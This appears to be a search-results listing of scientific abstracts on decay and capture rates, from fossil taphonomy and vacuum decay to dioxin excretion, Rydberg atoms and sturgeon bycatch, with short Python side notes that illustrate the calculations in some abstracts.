exceptionally preserved fossils, with non-random sequences of character loss distorting the position of fossil taxa in phylogenetic trees. By characterising these sequences we can rewind this distortion and make better-informed interpretations of the affinity of enigmatic fossil taxa. Equally, rate of character loss is crucial for estimating the preservation potential of phylogentically informative characters, and revealing the mechanisms of preservation themselves. However, experimental decay has been criticised for poorly modeling 'real' conditions, and dismissed as unsophisticated 'bucket science'. Here we test the effect of a differing experimental parameters on the rate and sequence of decay. By doing so, we can test the assumption that the results of decay experiments are applicable to informing interpretations of exceptionally preserved fossils from diverse preservational settings. The results of our experiments demonstrate the validity of using the sequence of character loss as a phylogenetic tool, and sheds light on the extent to which environment must be considered before making decay-informed interpretations, or reconstructing taphonomic pathways. With careful consideration of experimental design, driven by testable hypotheses, decay experiments are robust and informative - experimental taphonomy needn't kick the bucket just yet. 10. Precision decay rate calculations in quantum field theory Andreassen, Anders; Farhi, David; Frost, William; Schwartz, Matthew D. 
2017-04-01 Tunneling in quantum field theory is worth understanding properly, not least because it controls the long-term fate of our Universe. There are, however, a number of features of tunneling rate calculations which lack a desirable transparency, such as the necessity of analytic continuation, the appropriateness of using an effective instead of classical potential, and the sensitivity to short-distance physics. This paper attempts to review in pedagogical detail the physical origin of tunneling and its connection to the path integral. Both the traditional potential-deformation method and a recent, more direct, propagator-based method are discussed. Some new insights from using approximate semiclassical solutions are presented. In addition, we explore the sensitivity of the lifetime of our Universe to short-distance physics, such as quantum gravity, emphasizing a number of important subtleties. 11. Coordinate-dependent diffusion coefficients: Decay rate in open quantum systems SciTech Connect Sargsyan, V. V.; Palchikov, Yu. V.; Antonenko, N. V.; Kanokov, Z.; Adamian, G. G. 2007-06-15 Based on a master equation for the reduced density matrix of an open quantum collective system, the influence of coordinate-dependent microscopical diffusion coefficients on the decay rate from a metastable state is treated. For various frictions and temperatures larger than a crossover temperature, the quasistationary decay rates obtained with the coordinate-dependent microscopical set of diffusion coefficients are compared with those obtained with the coordinate-independent microscopical set of diffusion coefficients and coordinate-independent and -dependent phenomenological sets of diffusion coefficients. Neglecting the coordinate dependence of diffusion coefficients, one can strongly overestimate or underestimate the decay rate at low temperature. The coordinate-dependent phenomenological diffusion coefficient in momentum are shown to be suitable for applications. 12. Best rates of decay for coupled waves with different propagation speeds Oquendo, Higidio Portillo; Raya, Raul Prado 2017-08-01 We consider an abstract system of two coupled evolution equations. One of these equations has an internal damping, and the other is simply elastic. When both equations have the same propagation speed, Alabau et al. (J Evol Equ 2:127-150, 2002) showed that the semigroup of this system decays polynomially in time with the rate t^{-1/2}. In this work, we consider this coupled system when the propagation speeds of the equations are different, and we study the asymptotic behavior of the semigroup. For this case, we show that the semigroup still decays polynomially with a slower rate as t^{-1/4}. Moreover, we prove that this rate of decay is the best. 13. Change in decay rates of dioxin-like compounds in Yusho patients. PubMed Matsumoto, Shinya; Akahane, Manabu; Kanagawa, Yoshiyuki; Kajiwara, Jumboku; Mitoma, Chikage; Uchi, Hiroshi; Furue, Masutaka; Imamura, Tomoaki 2016-09-07 Once ingested, dioxins and dioxin-like compounds are excreted extremely slowly. Excretion can be evaluated by its half-life. Half-lives estimated from observed concentrations are affected by excretion and ongoing exposure. We investigated the change in apparent half-life using a theoretical model based on exposure to dioxin and dioxin-like compounds. We carried out longitudinal measurements of the blood concentration of dioxins and dioxin-like compounds in a Yusho cohort during 2002 to 2010. 
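(Regarding the Yusho entry in progress here: the "second-order equation" mentioned in the next sentence amounts to fitting a quadratic to log-concentration versus time, so the apparent decay rate, and hence the apparent half-life, can change over the observation period. The sketch below uses invented concentrations purely to show the arithmetic.)

```python
import numpy as np

# Hypothetical serial blood concentrations (pg/g lipid) of one congener, 2002-2010.
years = np.array([0, 2, 4, 6, 8], dtype=float)       # years since first survey
conc = np.array([120.0, 100.0, 86.0, 76.0, 69.0])     # illustrative values only

# Quadratic (second-order) fit to ln(concentration); the instantaneous decay rate
# is -d ln(C)/dt, so it is allowed to change over time.
a, b, c = np.polyfit(years, np.log(conc), 2)
for t in (0.0, 8.0):
    rate = -(2 * a * t + b)                           # per year
    print(f"t = {t:.0f} y: decay rate {rate:.4f} /y, apparent half-life {np.log(2) / rate:.1f} y")
```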
We estimated the change in decay rates of 2,3,4,7,8-PeCDF and octachlorodibenzodioxin (OCDD) using a second-order equation. We found that the decay rate of OCDD increased, whereas the decay rate of 2,3,4,7,8-PeCDF of patients with a relatively high concentration of 2,3,4,7,8-PeCDF decreased. OCDD results were in accordance with decreasing levels of dioxin and dioxin-like compounds in the environment. The decay rate of OCDD in the body was affected by the decay rate of OCDD in the environment by ingestion because it was near the steady-state. In contrast, the decay rate of 2,3,4,7,8-PeCDF in the body was affected less by ingestion from the environment because it was far higher than in the steady-state. We demonstrated that the level of 2,3,4,7,8-PeCDF in the environment is decreasing. The excretion half-life is longer than the environmental half-life, thus the excretion half-life in a Yusho patient is increased. 14. Neutrino energy loss rates and positron capture rates on {sup 55}Co for presupernova and supernova physics SciTech Connect 2008-05-15 Proton-neutron quasiparticle random phase approximation (pn-QRPA) theory has recently been used for the calculation of stellar weak interaction rates of the fp-shell nuclide with success. Neutrino losses from protoneutron stars play a pivotal role in deciding if these stars would be crushed into black holes or explode as supernovas. The product of abundance and positron capture rates on {sup 55}Co is substantial and as such can play a role in the fine tuning of input parameters of simulation codes especially in the presupernova evolution. Recently we introduced our calculation of capture rates on {sup 55}Co, in a luxurious model space of 7({Dirac_h}/2{pi}) {omega}, employing the pn-QRPA theory with a separable interaction. Simulators, however, may require these rates on a fine scale. Here we present for the first time an expanded calculation of the neutrino energy loss rates and positron capture rates on {sup 55}Co on an extensive temperature-density scale. This type of scale is appropriate for interpolation purposes and of greater utility for simulation codes. The pn-QRPA calculated neutrino energy loss rates are enhanced roughly up to two orders of magnitude compared with the large-scale shell model calculations and favor a lower entropy for the core of massive stars. 15. Design of cycler trajectories and analysis of solar influences on radioactive decay rates during space missions Rogers, Blake A. This thesis investigates the design of interplanetary missions for the continual habitation of Mars via Earth-Mars cyclers and for the detection of variations in nuclear decay rates due to solar influences. Several cycler concepts have been proposed to provide safe and comfortable quarters for astronauts traveling between the Earth and Mars. However, no literature has appeared to show how these massive vehicles might be placed into their cycler trajectories. Trajectories are designed that use either Vinfinity leveraging or low thrust to establish cycler vehicles in their desired orbits. In the cycler trajectory cases considered, the use of Vinfinity leveraging or low thrust substantially reduces the total propellant needed to achieve the cycler orbit compared to direct orbit insertion. In the case of the classic Aldrin cycler, the propellant savings due to Vinfinity leveraging can be as large as a 24 metric ton reduction for a cycler vehicle with a dry mass of 75 metric tons, and an additional 111 metric ton reduction by instead using low thrust. 
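(A side note on the 55Co entry above: rate tables published on an extensive temperature-density scale "for interpolation purposes" are typically consumed by interpolating the logarithm of the rate over the grid. The grid points and values below are invented; only the interpolation mechanics are the point, not any actual 55Co rates.)

```python
import numpy as np
from scipy.interpolate import RegularGridInterpolator

# Hypothetical table of log10(positron-capture rate [1/s]) on a
# (log10 T [K], log10 rho*Ye [g/cm^3]) grid; values are invented for illustration.
logT = np.array([9.0, 9.3, 9.6, 9.9])
logrho = np.array([5.0, 6.0, 7.0, 8.0])
log_rate = np.array([[-8.0, -7.2, -6.1, -4.9],
                     [-6.5, -5.8, -4.9, -3.8],
                     [-5.1, -4.5, -3.7, -2.8],
                     [-3.9, -3.4, -2.7, -1.9]])

interp = RegularGridInterpolator((logT, logrho), log_rate)
point = np.array([[9.45, 6.5]])            # conditions between grid points
print(f"interpolated rate ~ {10 ** interp(point)[0]:.3e} s^-1")
```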
The two-synodic period cyclers considered benefit less from Vinfinity leveraging, but have a smaller total propellant mass due to their lower approach velocities at Earth and Mars. It turns out that, for low-thrust establishment, the propellant required is approximately the same for each of the cycler trajectories. The Aldrin cycler has been proposed as a transportation system for human missions between Earth and Mars. However, the hyperbolic excess velocity values at the planetary encounters for these orbits are infeasibly large, especially at Mars. In a new version of the Aldrin cycler, low thrust is used in the interplanetary trajectories to reduce the encounter velocities. Reducing the encounter velocities at both planets reduces the propellant needed by the taxis (astronauts use these taxis to transfer between the planetary surfaces and the cycler vehicle) to perform hyperbolic rendezvous. While the propellant 16. Backstepping approach to the arbitrary decay rate for Euler-Bernoulli beam under boundary feedback Guo, Bao-Zhu; Jin, Feng-Fei 2010-10-01 In this article, we are concerned with the boundary stabilisation of the Euler-Bernoulli beam equation for which all eigenvalues of the (control) free system are located on the imaginary axis of the complex plane. The fourth-order system in spacial variable is transformed into a coupled heat-like system. This enables us to make a natural backstepping transformation in vector form to transform the system into a target system which has arbitrary decay rate. The state feedback is thus designed. It is shown that the original closed-loop system is exponentially stable with the given arbitrary decay rate. 17. Fluorescence decay rate statistics of a single molecule in a disordered cluster of nanoparticles SciTech Connect Froufe-Perez, L. S.; Carminati, R.; Saenz, J. J. 2007-07-15 The statistical properties of the fluorescence lifetime of single emitters in disordered systems are discussed. The contribution of radiative and nonradiative processes to the spontaneous decay rate is analyzed using a simple analytical model, in full agreement with exact numerical simulations. The relative fluctuations of the decay rate are shown to exhibit two well-defined regimes dominated either by near-field scattering or by absorption processes. In both regimes, the averaged apparent quantum yield remains high enough to permit practical measurements. Lifetime fluctuations could thus be used a probe of the local environment in complex systems at the nanometer scale. 18. Constraints on the η η' decay rate of a scalar glueball from gauge/gravity duality Brünner, Frederic; Rebhan, Anton 2015-12-01 Predictions of glueball decay rates in the holographic Witten-Sakai-Sugimoto model for low-energy QCD can be uniquely extended to include finite quark masses up to an as-yet-undetermined parameter in the coupling of glueballs to the nonanomalous part of the pseudoscalar mass terms. The assumption of a universal coupling of glueballs to mass terms of the full nonet of pseudoscalar mesons leads to flavor asymmetries in the decay rates of scalar glueballs that agree well with experimental data for the glueball candidate f0(1710 ) and implies a vanishing decay rate into η η' pairs, for which only upper bounds for the f0(1710 ) meson are known at present from experiment. Relaxing this assumption, the holographic model gives a tight correlation between the decay rates into pairs of pseudo-Goldstone bosons of the same type and η η' pairs. 
If Γ (G →K K )/Γ (G →π π ) is kept within the range reported currently by the Particle Data Group for the f0(1710 ) meson, the rate Γ (G →η η')/Γ (G →π π ) is predicted to be ≲0.04 . The corresponding situation for f0(1500 ) is also discussed; however, this is found to be much less compatible with the interpretation of a largely unmixed glueball. 19. Comparative capture rate responses of mosquito vectors to light trap and human landing collection methods USDA-ARS?s Scientific Manuscript database Capture rate responses of female Aedes albopictus Skuse, Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, Culex quinquefasciatus Say, and Ochlerotatus triseriatus (Wiedemann) to CDC-type light trap (LT) and human landing (HL) collection methods were observed and evaluated for congruency wi... 20. Evidence for correlations between fluctuations in 54Mn decay rates and solar storms Mohsinally, T.; Fancher, S.; Czerny, M.; Fischbach, E.; Gruenwald, J. T.; Heim, J.; Jenkins, J. H.; Nistor, J.; O'Keefe, D. 2016-02-01 Following recent indications that several radioactive isotopes show fluctuating decay rates which may be influenced by solar activity, we present findings from a 2 year period of data collection on 54Mn. Measurements were recorded hourly from a 1 μCi sample of 54Mn monitored from January 2010-December 2011. A series of signal-detection algorithms determine regions of statistically significant fluctuations in decay behaviour from the expected exponential form. The 239 decay flags identified during this interval were compared to daily distributions of multiple solar indices, generated by NOAA, which are associated with heightened solar activity. The indices were filtered to provide a list of the 413 strongest events during a coincident period. We find that 49% of the strongest solar events are preceded by at least 1 decay flag within a 48 h interval, and 37% of decay flags are followed by a reported solar event within 48 h. These results are significant at the 0.9σ and 2.8σ levels respectively, based on a comparison to results obtained from a shuffle test, in which the decay measurements were randomly shuffled in time 10,000 times. We also present results from a simulation combining constructed data reflecting 10 sites which compared and filtered decay flags generated from all sites. The results indicate a potential 35% reduction in the false positive rate in going from 1 to 10 sites. By implication, the improved statistics attest to the benefit of analysing data from a larger number of geographically distributed sites in parallel. 1. Blackbody-induced decay, excitation and ionization rates for Rydberg states in hydrogen and helium atoms Glukhov, I. L.; Nekipelov, E. A.; Ovsiannikov, V. D. 2010-06-01 New features of the blackbody-induced radiation processes on Rydberg atoms were discovered on the basis of numerical data for the blackbody-induced decay Pdnl(T), excitation Penl(T) and ionization Pionnl(T) rates of nS, nP and nD Rydberg states calculated together with the spontaneous decay rates Pspnl in neutral hydrogen, and singlet and triplet helium atoms for some values of the principal quantum number n from 10 to 500 at temperatures from T = 100 K to 2000 K. The fractional rates Rd(e, ion)nl(T) = Pnld(e, ion)(T)/Pspnl equal to the ratio of the induced decay (excitation, ionization) rates to the rate of spontaneous decay were determined as functions of T and n in every series of states with a given angular momentum l = 0, 1, 2. 
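(A side note on the 54Mn entry above: its quoted significance levels come from a shuffle test, i.e. permuting the decay-flag series in time to build a null distribution of chance coincidences. The sketch below reproduces only the mechanics; the flag and event series are synthetic, and only the counts of 239 flags and 413 events, the 48 h window and the shuffling idea are taken from the entry.)

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic hourly series over ~2 years: True where a decay flag / solar event occurs.
n_hours = 2 * 365 * 24
flags = np.zeros(n_hours, dtype=bool)
events = np.zeros(n_hours, dtype=bool)
flags[rng.choice(n_hours, 239, replace=False)] = True     # 239 decay flags
events[rng.choice(n_hours, 413, replace=False)] = True    # 413 solar events

def frac_events_preceded(flags, events, window=48):
    """Fraction of events with at least one flag in the preceding `window` hours."""
    idx = np.flatnonzero(events)
    return np.mean([flags[max(0, i - window):i].any() for i in idx])

observed = frac_events_preceded(flags, events)

# Shuffle test: permute the flag series in time to build a null distribution.
null = np.array([frac_events_preceded(rng.permutation(flags), events)
                 for _ in range(1000)])
z = (observed - null.mean()) / null.std()
print(f"observed fraction {observed:.2f}, null {null.mean():.2f} +/- {null.std():.2f}, z = {z:.1f}")
```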
The calculated data reveal an essential difference between the asymptotic dependence of the ionization rate Pionnl(T) and the rates of decay and excitation Pd(e)nl(T)~T/n2. The departures appear in each Rydberg series for n > 100 and introduce appreciable corrections to the formula of Cooke and Gallagher. Two different approximation formulae are proposed on the basis of the numerical data, one for Rd(e)nl(T) and another one for Rionnl(T), which reproduce the calculated values in wide ranges of principal quantum number from n = 10 to 1000 and temperatures between T = 100 K and T = 2000 K with an accuracy of 2% or better. Modified Fues' model potential approach was used for calculating matrix elements of bound-bound and bound-free radiation transitions in helium. 2. Designing screening protocols for amphibian disease that account for imperfect and variable capture rates of individuals. PubMed Canessa, Stefano; Martel, An; Pasmans, Frank 2014-07-01 The amphibian chytrid fungus, Batrachochytrium dendrobatidis, is one of the main factors in global amphibian decline. Accurate knowledge of its presence and prevalence in an area is needed to trigger conservation actions. However, imperfect capture rates determine the number of individuals caught and tested during field surveys, and contribute to the uncertainty surrounding estimates of prevalence. Screening programs should be planned with the objective of minimizing such uncertainty. We show how this can be achieved by using predictive models that incorporate information about population size and capture rates. Using as a case study an existing screening program for three populations of the yellow-bellied toad (Bombina variegata pachypus) in northern Italy, we sought to quantify the effect of seasonal variation in individual capture rates on the uncertainty surrounding estimates of chytrid prevalence. We obtained estimates of population size and capture rates from mark-recapture data, and found wide seasonal variation in the individual recapture rates. We then incorporated this information in a binomial model to predict the estimates of prevalence that would be obtained by sampling at different times in the season, assuming no infected individuals were found. Sampling during the period of maximum capture probability was predicted to decrease upper 95% credible intervals by a maximum of 36%, compared with least suitable periods, with greater gains when using uninformative priors. We evaluated model predictions by comparing them with the results of screening surveys in 2012. The observed results closely matched the predicted figures for all populations, suggesting that this method can be reliably used to maximize the sampling size of surveillance programs, thus improving their efficiency. 3. False vacuum transitions —Analytical solutions and decay rate values Correa, R. A. C.; Moraes, P. H. R. S.; da Rocha, Roldão 2015-08-01 In this work we show a class of oscillating configurations for the evolution of the domain walls in Euclidean space. The solutions are obtained analytically. Phase transitions are achieved from the associated fluctuation determinant, by the decay rates of the false vacuum. 4. 
Stochastic stability of a class of unbounded delay neutral stochastic differential equations with general decay rate Hu, Yangzi; Wu, Fuke; Huang, Chengming 2012-02-01 Without the linear growth condition on the drift coefficient, this article examines the existence and uniqueness of global solutions of a class of neutral stochastic differential equations with unbounded delay and their asymptotic stabilities with general decay rate. To illustrate the application of our results, this article gives a two-dimensional system as an example. 5. O(α³ ln α) Corrections to Positronium Decay Rates SciTech Connect Melnikov, Kirill 2001-07-25 We compute O(α³ ln α) corrections to the decay rates of para- and orthopositronium into two and three photons, respectively. For this calculation we employ the nonrelativistic QED regularized dimensionally and we explain how in this framework the logarithms of the fine structure constant can be extracted. 6. Estimate Of The Decay Rate Constant of Hydrogen Sulfide Generation From Landfilled Drywall EPA Science Inventory Research was conducted to investigate the impact of particle size on H2S gas emissions and estimate a decay rate constant for H2S gas generation from the anaerobic decomposition of drywall. Three different particle sizes of regular drywall and one particle size of paperless drywa... 8. First measurements of muon production rate using a novel pion capture system at MuSIC Cook, S.; D'Arcy, R.; Fukuda, M.; Hatanaka, K.; Hino, Y.; Kuno, Y.; Lancaster, M.; Mori, Y.; Nam, T. H.; Ogitsu, T.; Sakamoto, H.; Sato, A.; Truong, N. M.; Yamamoto, A.; Yoshida, M.; Wing, M. 2013-02-01 The MuSIC (Muon Science Innovative Channel) beam line at RCNP (Research Centre for Nuclear Physics), Osaka will be the most intense source of muons in the world. A proton beam is incident on a target and, by using a novel capture solenoid, guides the produced pions into the beam line where they subsequently decay to muons. This increased muon flux will allow more precise measurements of cLFV (charged Lepton Flavour Violation) as well as making muon beams more economically feasible. Currently the first 36° of solenoid beam pipe have been completed and installed for testing with low proton current of 1 nA. Measurements of the total particle flux and the muon lifetime were made. The measurements were taken using thin plastic scintillators coupled to MPPCs (Multi-Pixel Photon Counter) that surrounded a magnesium or copper stopping target. The scintillators were used to record which particles stopped and their subsequent decay times, giving a muon yield of 8.5 × 10⁵ muons W⁻¹ of proton beam power or 3 × 10⁸ muons s⁻¹ when using the RCNP's full power (400 W). 9. Configuration splitting and gamma-decay transition rates in the two-group shell model SciTech Connect Isakov, V. I. 2015-09-15 Expressions for reduced gamma-decay transition rates were obtained on the basis of the two-group configuration model for the case of transitions between particles belonging to identical groups of nucleons.
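(A side note on the screening-protocol entry above, on the yellow-bellied toad: when every sampled individual tests negative, the upper credible bound on chytrid prevalence is driven by how many individuals the seasonal capture rate lets you test. The sketch below uses a conjugate Beta-binomial model with an uninformative prior and invented population size and capture probabilities; the study's actual model may differ in detail.)

```python
from scipy.stats import beta

def prevalence_upper_bound(n_tested_negative, a=1.0, b=1.0, cred=0.95):
    """Upper credible bound on prevalence when all sampled animals test negative.

    Beta(a, b) prior on prevalence; zero positives in n trials give a
    Beta(a, b + n) posterior.
    """
    return beta.ppf(cred, a, b + n_tested_negative)

population = 60                        # hypothetical toad population size
for capture_prob in (0.1, 0.4, 0.8):   # illustrative seasonal capture probabilities
    n = round(population * capture_prob)   # expected number of individuals sampled
    print(f"capture prob {capture_prob:.1f}: n = {n:2d}, "
          f"95% upper bound on prevalence = {prevalence_upper_bound(n):.2f}")
```

Sampling when capture probability is highest increases n and therefore tightens the upper bound, which is the effect the entry quantifies.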
In practical applications, the present treatment is the most appropriate for describing decays for odd–odd nuclei in the vicinity of magic nuclei or for nuclei where the corresponding subshells stand out in energy. Also, a simple approximation is applicable to describing configuration splitting in those cases. The present calculations were performed for nuclei whose mass numbers are close to A ∼ 90, including N = 51 odd—odd isotones. 10. The rate of decay of fresh fission products from a nuclear reactor Dolan, David J. Determining the rate of decay of fresh fission products from a nuclear reactor is complex because of the number of isotopes involved, different types of decay, half-lives of the isotopes, and some isotopes decay into other radioactive isotopes. Traditionally, a simplified rule of 7s and 10s is used to determine the dose rate from nuclear weapons and can be to estimate the dose rate from fresh fission products of a nuclear reactor. An experiment was designed to determine the dose rate with respect to time from fresh fission products of a nuclear reactor. The experiment exposed 0.5 grams of unenriched Uranium to a fast and thermal neutron flux from a TRIGA Research Reactor (Lakewood, CO) for ten minutes. The dose rate from the fission products was measured by four Mirion DMC 2000XB electronic personal dosimeters over a period of six days. The resulting dose rate following a rule of 10s: the dose rate of fresh fission products from a nuclear reactor decreases by a factor of 10 for every 10 units of time. 11. Capture locations and growth rates of Atlantic sturgeon in the Chesapeake Bay USGS Publications Warehouse Welsh, S.A.; Eyler, S.M.; Mangold, M.F.; Spells, A.J. 2002-01-01 Little information exists on temporal and spatial distributions of wild and hatchery-reared Atlantic sturgeon Acipenser oxyrinchus oxyrinchus in the Chesapeake Bay. Approximately 3,300 hatchery-reared Atlantic sturgeon comprised of two size groups were released into the Nanticoke River, a tributary of the Chesapeake Bay, on 8 July 1996. During January 1996-May 2000, 1099 Atlantic sturgeon were captured incidentally (i.e., bycatch) by commercial watermen in the Chesapeake Bay, including 420 hatchery-reared individuals. Wild and hatchery-reared Atlantic sturgeon were captured primarily in pound nets and gill nets. Biologists tagged each fish and recorded weight, length, and location of capture. Although two adults greater than 2000 mm fork length (FL) were captured in Maryland waters, wild sturgeon were primarily juveniles from Maryland and Virginia waters (415 and 259 individuals below 1000 mm FL, respectively). A growth rate of 0.565 mm/d (N = 15, SE = 0.081) was estimated for wild individuals (487-944 mm TL at release) at liberty from 30 to 622 d. The average growth of the group of hatchery-reared Atlantic sturgeon raised at 10??C exceeded that of the group raised at 17??C. Our distributional data based on capture locations are biased by fishery dependence and gear selectivity. These data are informative to managers, however, because commercial effort is widely distributed in the Chesapeake Bay, and little distributional data were available before this study. 12. Efficacy of trap modifications for increasing capture rates of aquatic snakes in floating aquatic funnel traps USGS Publications Warehouse Halstead, Brian J.; Wylie, Glenn D.; Casazza, Michael L. 
2013-01-01 Increasing detection and capture probabilities of rare or elusive herpetofauna of conservation concern is important to inform the scientific basis for their management and recovery. The Giant Gartersnake (Thamnophis gigas) is an example of a secretive, wary, and generally difficult-to-sample species about which little is known regarding its patterns of occurrence and demography. We therefore evaluated modifications to existing traps to increase the detection and capture probabilities of the Giant Gartersnake to improve the precision with which occurrence, abundance, survival, and other demographic parameters are estimated. We found that adding a one-way valve constructed of cable ties to the small funnel opening of traps and adding hardware cloth extensions to the wide end of funnels increased capture rates of the Giant Gartersnake by 5.55 times (95% credible interval = 2.45–10.51) relative to unmodified traps. The effectiveness of these modifications was insensitive to the aquatic habitat type in which they were deployed. The snout-vent length of the smallest and largest captured snakes did not vary among trap modifications. These trap modifications are expected to increase detection and capture probabilities of the Giant Gartersnake, and show promise for increasing the precision with which demographic parameters can be estimated for this species. We anticipate that the trap modifications found effective in this study will be applicable to a variety of aquatic and semi-aquatic reptiles and amphibians and improve conservation efforts for these species. 13. Simple estimation of thermal capture rates for ion-dipole collisions by canonical effective potential methods Marković, Nikola; Nordholm, Sture 1989-07-01 Thermal capture rate coefficients are considered for collision partners which at long range interact by ion-dipole plus polarization potentials. The simple Langevin-Gioumousis-Stevenson theory is extended by mapping the true asymmetric multidimensional interaction potential onto an effective spherically symmetric potential obtained by analysis of canonical probability or flux equalities. Bound states are eliminated in the mapping as well as in the final rate coefficient. Capture rate coefficients are calculated for H 3+ ions colliding with HCl, CS and HCN in a model where the ion is represented as a point charge and the target as a diatomic molecule. Corresponding calculations are carried out using canonical variational transition state theory. The theoretical results are compared with corresponding results obtained in classical trajectory calculations wherein the diatomic target (HCl, CS or HCN) is modeled as two point charges. 14. High-Rate Data-Capture for an Airborne Lidar System NASA Technical Reports Server (NTRS) Valett, Susan; Hicks, Edward; Dabney, Philip; Harding, David 2012-01-01 A high-rate data system was required to capture the data for an airborne lidar system. A data system was developed that achieved up to 22 million (64-bit) events per second sustained data rate (1408 million bits per second), as well as short bursts (less than 4 s) at higher rates. All hardware used for the system was off the shelf, but carefully selected to achieve these rates. The system was used to capture laser fire, single-photon detection, and GPS data for the Slope Imaging Multi-polarization Photo-counting Lidar (SIMPL). 
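(A side note on the SIMPL data-capture entry above: the quoted sustained rate of 22 million 64-bit events per second corresponds to 1408 million bits per second, as the short check below reproduces. The 4 s burst figure is computed at the sustained rate and is only illustrative, since the entry notes that short bursts run at higher rates.)

```python
def data_rate_mbit_per_s(events_per_s, bits_per_event=64):
    """Sustained data rate implied by an event stream of fixed-size records."""
    return events_per_s * bits_per_event / 1e6

rate = data_rate_mbit_per_s(22e6)          # 22 million 64-bit events per second
print(f"sustained rate: {rate:.0f} Mbit/s ({rate / 8 / 1000:.2f} GB/s)")
print(f"storage for a 4 s burst at the sustained rate: {22e6 * 64 * 4 / 8 / 1e9:.1f} GB")
```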
However, the system has applications for other laser altimeter systems (waveform-recording), mass spectroscopy, xray radiometry imaging, high-background- rate ranging lidar, and other similar areas where very high-speed data capture is needed. The data capture software was used for the SIMPL instrument that employs a micropulse, single-photon ranging measurement approach and has 16 data channels. The detected single photons are from two sources those reflected from the target and solar background photons. The instrument is non-gated, so background photons are acquired for a range window of 13 km and can comprise many times the number of target photons. The highest background rate occurs when the atmosphere is clear, the Sun is high, and the target is a highly reflective surface such as snow. Under these conditions, the total data rate for the 16 channels combined is expected to be approximately 22 million events per second. For each photon detection event, the data capture software reads the relative time of receipt, with respect to a one-per-second absolute time pulse from a GPS receiver, from an event timer card with 0.1-ns precision, and records that information to a RAID (Redundant Array of Independent Disks) storage device. The relative time of laser pulse firings must also be read and recorded with the same precision. Each of the four event timer cards handles the throughput from four of the channels. For each detection event, a flag is 15. Beta-decay rate and beta-delayed neutron emission probability of improved gross theory Koura, Hiroyuki 2014-09-01 A theoretical study has been carried out on beta-decay rate and beta-delayed neutron emission probability. The gross theory of the beta decay is based on an idea of the sum rule of the beta-decay strength function, and has succeeded in describing beta-decay half-lives of nuclei overall nuclear mass region. The gross theory includes not only the allowed transition as the Fermi and the Gamow-Teller, but also the first-forbidden transition. In this work, some improvements are introduced as the nuclear shell correction on nuclear level densities and the nuclear deformation for nuclear strength functions, those effects were not included in the original gross theory. The shell energy and the nuclear deformation for unmeasured nuclei are adopted from the KTUY nuclear mass formula, which is based on the spherical-basis method. Considering the properties of the integrated Fermi function, we can roughly categorized energy region of excited-state of a daughter nucleus into three regions: a highly-excited energy region, which fully affect a delayed neutron probability, a middle energy region, which is estimated to contribute the decay heat, and a region neighboring the ground-state, which determines the beta-decay rate. Some results will be given in the presentation. A theoretical study has been carried out on beta-decay rate and beta-delayed neutron emission probability. The gross theory of the beta decay is based on an idea of the sum rule of the beta-decay strength function, and has succeeded in describing beta-decay half-lives of nuclei overall nuclear mass region. The gross theory includes not only the allowed transition as the Fermi and the Gamow-Teller, but also the first-forbidden transition. In this work, some improvements are introduced as the nuclear shell correction on nuclear level densities and the nuclear deformation for nuclear strength functions, those effects were not included in the original gross theory. 
The shell energy and the nuclear deformation for 16. Measurement of the decay rate of the SiH feature as a function of temperature NASA Technical Reports Server (NTRS) Nuth, Joseph A., III; Kraus, George F. 1994-01-01 We have previously suggested that the SiH fundamental stretch could serve as a diagnostic indicator of the oxidation state of silicate surfaces exposed to the solar wind for prolonged periods. We have now measured the primary decay rate of SiH in vacuo as a function of temperature and find that the primary rate constant for the decay can be characterized by the following equation: k(min(exp -1)) approximately equals 0.186 exp(-9/RT) min(exp -1), where R = 2 x 10(exp -3) kcal deg(exp -1) mole(exp -1). This means that the half-life for the decay of the SiH feature at room temperature is approximately 20 yrs, whereas the half-life at a peak lunar regolith temperature of approximately 500K would be only approximately 20 days. At the somewhat lower temperature of approximately 400K the half-life for the decay is on the order of 200 days. The rate of loss of SiH as a function of temperature provides an upper limit to the quantity of H implanted by the solar wind which can be retained by a silicate grain in a planetary regolith. This will be discussed in more detail here. 17. Note on intrinsic decay rates for abstract wave equations with memory Lasiecka, Irena; Messaoudi, Salim A.; Mustafa, Muhammad I. 2013-03-01 In this paper we consider a viscoelastic abstract wave equation with memory kernel satisfying the inequality g' + H(g) ⩽ 0, s ⩾ 0 where H(s) is a given continuous, positive, increasing, and convex function such that H(0) = 0. We shall develop an intrinsic method, based on the main idea introduced by Lasiecka and Tataru ["Uniform boundary stabilization of semilinear wave equation with nonlinear boundary dissipation," Differential and Integral Equations 6, 507-533 (1993)], for determining decay rates of the energy given in terms of the function H(s). This will be accomplished by expressing the decay rates as a solution to a given nonlinear dissipative ODE. We shall show that the obtained result, while generalizing previous results obtained in the literature, is also capable of proving optimal decay rates for polynomially decaying memory kernels (H(s) ˜ sp) and for the full range of admissible parameters p ∈ [1, 2). While such result has been known for certain restrictive ranges of the parameters p ∈ [1, 3/2), the methods introduced previously break down when p ⩾ 3/2. The present paper develops a new and general tool that is applicable to all admissible parameters. 18. Characterization of decay and emission rates of ultrafine particles in indoor ice rink. PubMed Kim, J; Lee, K 2013-08-01 The purposes of this study were to determine indoor ultrafine particle (UFP, diameter <100 nm) levels in ice rinks and to characterize UFP decay and emission rates. All 15 public ice rinks in Seoul were investigated for UFP and carbon monoxide (CO) concentrations. Three ice rinks did not show peaks in UFP concentrations, and one ice rink used two resurfacers simultaneously. High peaks of UFP and CO concentrations were observed when the resurfacer was operated. The average air change rate in the 11 ice rinks was 0.21 ± 0.13/h. The average decay rates of UFP number concentrations measured by the P-Trak and DiSCmini were 0.54 ± 0.21/h and 0.85 ± 0.34/h, respectively. The average decay rate of UFP surface area concentration was 0.33 ± 0.15/h. 
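(A side note on the SiH entry above: its Arrhenius rate law can be turned directly into half-lives, reproducing the quoted values of roughly 20 years near room temperature, about 200 days at 400 K and about 20 days at 500 K. A minimal sketch using only the constants given in that entry:)

```python
import math

R = 2e-3            # kcal K^-1 mol^-1, as given in the SiH entry above
A = 0.186           # pre-exponential factor, min^-1
Ea = 9.0            # kcal mol^-1 (the "9" in exp(-9/RT))

def half_life_days(T_kelvin):
    """Half-life of the SiH feature from the quoted first-order Arrhenius rate."""
    k = A * math.exp(-Ea / (R * T_kelvin))      # min^-1
    return math.log(2) / k / (60 * 24)          # convert minutes to days

for T in (300, 400, 500):
    print(f"T = {T} K: half-life ~ {half_life_days(T):.0f} days ({half_life_days(T) / 365:.1f} yr)")
```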
